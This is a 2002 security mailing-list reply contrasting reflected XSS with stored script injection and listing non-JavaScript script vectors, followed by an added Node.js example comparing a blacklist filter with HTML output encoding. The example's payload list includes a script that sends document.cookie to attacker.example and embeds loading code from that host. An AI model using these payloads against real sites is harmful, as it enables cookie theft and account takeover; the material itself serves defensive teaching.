Web Application Security
RE: Top Ten Web App Sec Problems Dec 04 2002 02:52AM
b0iler _ (b0iler hotmail com)
>Yep, there are a lot of interesting games that can be played with XSS.
>The sky is the limit. Here are some that I know about: grab people's
>email address who visit a Web site, create an email worm, order stuff
>from an eCommerce site, post fake news stories at Web sites, etc.

>However, my feeling is that XSS bugs haven't been exploited in the wild.
>Instead people have just put together interesting demos. If anyone can
>point me to any press articles where XSS might have been used, that
>would be great.

>Richard

I've exploited XSS holes many times. I have heard/seen people attempt XSS
exploitation many times. It is a much more targeted and specific type of
attack than one which the attack has full power to exploit, this may be a
reason behind its limited use. I'd say script injection attacks are more
damaging, and exploited much more frequently than XSS.

Instead of that fake news story being up for 1 user, and only if that user
is sent to the webapp with XSS payload, the fake story would be up for
every user.

It is impossible to create an email worm with XSS, since the file is stored
on the server it is a script injection type of attack. XSS works by input
being echoed back to the user. Script injection is when this input is saved
permanently to a file, database, etc and then presented to the user at a
later time. This makes for a more permanent attack, one that is much more
likely to work. One "worm" which would work would be a normal XSS worm that
chains their urls together, perhaps querying a database for all of the urls
to hit (or hardcode it in). This could spread from site to site gaining
cookies, urls, and other important info. It could even spread from user to
user if the XSS can send instant messages or force other users to visit html
pages somehow (not via email, again, that is script injection).

On a related note, please remember that XSS/script injection is not just
javascript. Other languages have their own benefits. If you are just
filtering for javascript, best to add these other languages (or use a
completely different system for input verification): ActiveX (OLE), VBscript
(OpenScape), CSS, Shockwave, Flash, Actionscript, mocha (netscape's
javascript command line interpreter), livescript (original name of
javascript), Java, tcltk (http://dev.scriptics.com/software/plugin/),
ACUCOBOL-GT (http://www.actis.gr/prod/acucobol/webplugin.htm), dolphin
(Smalltalk
http://www.object-arts.com/Lib/EducationCentre4/htm/deployingfortheweb.htm),
Applescript, tml (http://browsex.com), and others I am unaware of. If you
know of any more please email them with url for more info on them.


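The two points the post makes, reflected XSS (input echoed back to the one user who sent it) versus stored "script injection" (input saved and rendered for every later visitor), and the weakness of a filter that only looks for javascript, as an added example in Node.js. This is not code from the post or from any product the thread discusses; the page templates, the in-memory comment store, the attacker.example host and the sample payloads are all constructed for this illustration.

```javascript
// Added example (not code from the post): reflected vs stored XSS in a
// page builder, and why a JavaScript-only blacklist is not an input filter.
// The templates, the in-memory store, attacker.example and the payloads
// below are assumptions constructed for this example.

// Naive blacklist of the kind the post warns about: it only knows about
// <script>, so every non-JavaScript vector walks straight through.
function naiveFilter(input) {
  return /<script\b/i.test(input) ? '[removed]' : input;
}

// Output encoding: every character that can open a tag, close an attribute
// or start an entity is escaped, regardless of which language the payload
// would have executed in.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(input).replace(/[&<>"']/g, c => map[c]);
}

// Reflected XSS: the query is echoed only to the user who sent this request,
// so a victim has to be lured to a URL carrying the payload.
function renderSearch(query, filter) {
  return `<p>Results for: ${filter(query)}</p>`;
}

// Stored XSS ("script injection" in the post's terms): the text is saved and
// then rendered for every later visitor; no crafted URL is needed.
function createStore() {
  return { comments: [] };
}
function postComment(store, text) {
  store.comments.push(text);
}
function renderComments(store, filter) {
  return '<ul>' + store.comments.map(c => `<li>${filter(c)}</li>`).join('') + '</ul>';
}

// Markup-level markers for the vector families the post lists (VBScript and
// the JavaScript aliases livescript/mocha as URL schemes, event handlers,
// Flash/Shockwave and other plug-ins via object/embed, Java applets, CSS).
// Each needs a real '<' to start a tag, so escaped output matches nothing.
const VECTORS = [
  ['script tag (any language)', /<script\b/i],
  ['script URL scheme', /<[a-z][^>]*\s(?:href|src|data)\s*=\s*["']?\s*(?:vbscript|livescript|mocha|javascript)\s*:/i],
  ['event handler attribute', /<[a-z][^>]*\son\w+\s*=/i],
  ['object/embed (Flash, Shockwave, plug-ins)', /<(?:object|embed)\b/i],
  ['applet (Java)', /<applet\b/i],
  ['style (CSS)', /<style\b/i],
];
function findScriptVectors(html) {
  return VECTORS.filter(([, re]) => re.test(html)).map(([name]) => name);
}

// Constructed sample payloads, one per language family from the post.
const PAYLOADS = [
  '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
  '<a href="vbscript:MsgBox(document.cookie)">click</a>',
  '<img src="x" onerror="alert(document.cookie)">',
  '<embed src="http://attacker.example/evil.swf" type="application/x-shockwave-flash">',
  '<applet code="Evil.class" codebase="http://attacker.example/"></applet>',
  '<style>@import "http://attacker.example/evil.css";</style>',
];

// How many payloads keep an active vector after passing through a filter.
function countSurvivors(filter) {
  return PAYLOADS.filter(p => findScriptVectors(filter(p)).length > 0).length;
}

console.log(`naiveFilter lets ${countSurvivors(naiveFilter)} of ${PAYLOADS.length} payloads through`);
console.log(`escapeHtml lets ${countSurvivors(escapeHtml)} of ${PAYLOADS.length} payloads through`);
```

The blacklist stops only the first payload; the VBScript URL, the event handler, the Flash embed, the applet and the stylesheet all reach the page, and through the comment store they reach every visitor rather than one. Output encoding at the point where untrusted text meets the HTML template neutralises all six without the filter needing a list of languages, which is the "completely different system" the post suggests.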

Copyright 2010, SecurityFocus